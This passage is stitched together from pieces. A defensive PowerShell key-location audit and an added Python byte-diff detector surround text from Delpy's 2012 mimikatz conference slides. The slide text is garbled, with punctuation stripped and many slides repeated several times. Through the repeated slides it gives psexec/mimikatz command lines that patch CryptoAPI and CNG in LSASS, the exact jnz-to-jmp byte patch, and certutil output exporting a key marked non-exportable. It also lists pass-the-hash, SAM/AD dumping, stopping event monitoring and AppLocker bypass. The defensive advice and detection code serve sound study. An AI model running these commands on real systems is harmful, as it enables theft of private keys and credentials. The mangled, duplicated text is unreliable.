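        Api        = $null     # 'CNG' (key isolated in LSASS) or 'CAPI' (key loaded into the caller)
        Provider   = $null
        Exportable = $null
        Software   = $null
    }
    $keyObj = $null
    try {
        # Opening the key handle does not use the key, so smart cards normally do not ask for a PIN.
        $keyObj = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Certificate)
        if ($null -eq $keyObj) {
            $keyObj = [System.Security.Cryptography.X509Certificates.ECDsaCertificateExtensions]::GetECDsaPrivateKey($Certificate)
        }
        if ($null -eq $keyObj) {
            $info.Provider = '(private key not accessible)'
        } elseif ($keyObj -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
            # Legacy CryptoAPI: the CSP (rsaenh.dll for the software ones) runs inside this process
            $csp = $keyObj.CspKeyContainerInfo
            $info.Api        = 'CAPI'
            $info.Provider   = $csp.ProviderName
            $info.Exportable = $csp.Exportable
        } else {
            # RSACng / ECDsaCng expose the underlying CngKey, whose private part sits in KeyIso
            $cng = $keyObj.Key
            $info.Api        = 'CNG'
            $info.Provider   = $cng.Provider.Provider
            $info.Exportable = (($cng.ExportPolicy -band
                [System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0)
        }
        if ($info.Provider) { $info.Software = ($SoftwareProviders -contains $info.Provider) }
    } catch {
        $info.Provider = "(error: $($_.Exception.Message))"
    } finally {
        if ($keyObj) { $keyObj.Dispose() }
    }
    [pscustomobject]$info
}

function Get-SoftwareKeyReport {
    param([string[]]$StorePaths = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    $rows = foreach ($path in $StorePaths) {
        Get-ChildItem -Path $path -ErrorAction SilentlyContinue |
            Where-Object { $_.HasPrivateKey } |
            ForEach-Object { Get-PrivateKeyLocation -Certificate $_ }
    }
    $rows | Format-Table Subject, Api, Provider, Exportable, Software -AutoSize
    $soft = @($rows | Where-Object { $_.Software })
    Write-Host ('{0} of {1} private keys live in a software provider; candidates for a smart card, a TPM-backed KSP (Microsoft Platform Crypto Provider) or an HSM.' -f $soft.Count, @($rows).Count)
}

Get-SoftwareKeyReport
```

The Exportable column is the flag the two patches exist to ignore, so treat it as informational: on a software provider it only tells you whether the key can be exported by a well-behaved caller. The Provider column is the one that matters for the slide's recommendation, since moving a key to a hardware-backed provider is what removes the private material from the process and from LSASS.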
mimikatz / what else can it do? (slide 55)

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…

mimikatz / that's all folks (slide 56)

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention

Questions?
Don't be shy ;)
especially if you have written the corresponding slide number

Blog, Source Code & Contact (slide 57)

blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto / patchcng: because sometimes I own LSASS (slide 49)
This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
(before)
.text:6C815210 75 1C jnz short continue_key_export
(after)
.text:6C815210 EB 1C jmp short continue_key_export
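The change above lives only in LSASS memory, so a defender who can read the loaded ncrypt image can compare it with the copy on disk and spot the altered byte. The block below is an added example written for this page, not code from the slides or from mimikatz: its only real data are the two instruction encodings quoted above (75 1C and EB 1C at .text:6C815210); the bytes around them and the "on disk" / "in memory" buffers are constructed sample input. It reports every differing byte and, when the byte was the opcode of a short branch whose displacement did not change, decodes both versions so the jnz-to-jmp edit reads as "same target, condition removed". Obtaining the real buffers (from a debugger or a memory image) is outside the block.

```python
"""
Added example, not code from the slides or from mimikatz: compare a code
range of a loaded module against its on-disk image and decode any short
branch that was altered.  The two instructions quoted on the slide,
  .text:6C815210  75 1C  jnz short continue_key_export   (original)
  .text:6C815210  EB 1C  jmp short continue_key_export   (patched)
are the only real bytes here; the bytes around them and the "on disk" /
"in memory" buffers are constructed sample data.
"""
from dataclasses import dataclass

# Opcodes of the 2-byte short branches (8-bit signed displacement) handled here.
SHORT_BRANCHES = {
    0x74: ("jz", True),    # taken only if ZF == 1
    0x75: ("jnz", True),   # taken only if ZF == 0
    0xEB: ("jmp", False),  # always taken
}


@dataclass(frozen=True)
class Branch:
    address: int
    mnemonic: str
    target: int
    conditional: bool


def decode_short_branch(address: int, code: bytes) -> Branch:
    """Decode the 2-byte short branch at `address`.

    The target is the address of the next instruction (address + 2)
    plus the signed 8-bit displacement in the second byte.
    """
    if len(code) < 2 or code[0] not in SHORT_BRANCHES:
        raise ValueError(f"no short branch at {address:#x}: {code[:2].hex()}")
    mnemonic, conditional = SHORT_BRANCHES[code[0]]
    rel8 = int.from_bytes(code[1:2], "little", signed=True)
    return Branch(address, mnemonic, address + 2 + rel8, conditional)


def diff_code(base: int, on_disk: bytes, in_memory: bytes) -> list:
    """Return (address, expected, observed) for every byte that differs."""
    if len(on_disk) != len(in_memory):
        raise ValueError("both buffers must cover the same address range")
    return [(base + i, d, m)
            for i, (d, m) in enumerate(zip(on_disk, in_memory)) if d != m]


def explain_patch(base: int, on_disk: bytes, in_memory: bytes) -> list:
    """One line per modified byte; when the byte was the opcode of a short
    branch and the displacement is unchanged, say what the branch became."""
    notes = []
    for addr, expected, observed in diff_code(base, on_disk, in_memory):
        off = addr - base
        note = f"{addr:#010x}: {expected:02X} -> {observed:02X}"
        if (off + 2 <= len(on_disk)
                and expected in SHORT_BRANCHES and observed in SHORT_BRANCHES):
            before = decode_short_branch(addr, on_disk[off:off + 2])
            after = decode_short_branch(addr, in_memory[off:off + 2])
            if before.target == after.target:
                dropped = before.conditional and not after.conditional
                note += (f" ({before.mnemonic} to {before.target:#x} became "
                         f"{after.mnemonic}: same target, condition "
                         f"{'removed' if dropped else 'changed'})")
        notes.append(note)
    return notes


# Constructed sample range starting two bytes before the quoted instruction.
BASE = 0x6C81520E
ON_DISK = bytes.fromhex("85C0" "751C" "33C0")    # test eax,eax ; jnz +0x1C ; xor eax,eax (padding constructed)
IN_MEMORY = bytes.fromhex("85C0" "EB1C" "33C0")  # same bytes with the jnz turned into jmp

if __name__ == "__main__":
    for line in explain_patch(BASE, ON_DISK, IN_MEMORY):
        print(line)
```

Only the opcode byte differs; the displacement 1C is reused, so both versions land on the same `continue_key_export` target and the difference is purely whether the export check still gates the path. The same comparison, repeated after a KeyIso service restart or a reboot, shows the buffers matching again, which is the persistence boundary the slides state.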
mimikatz crypto / patchcng: demo time (slide 50)
Import, export, import as not exportable… export again
mimikatz crypto / patchcng: limitations (slide 51)
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
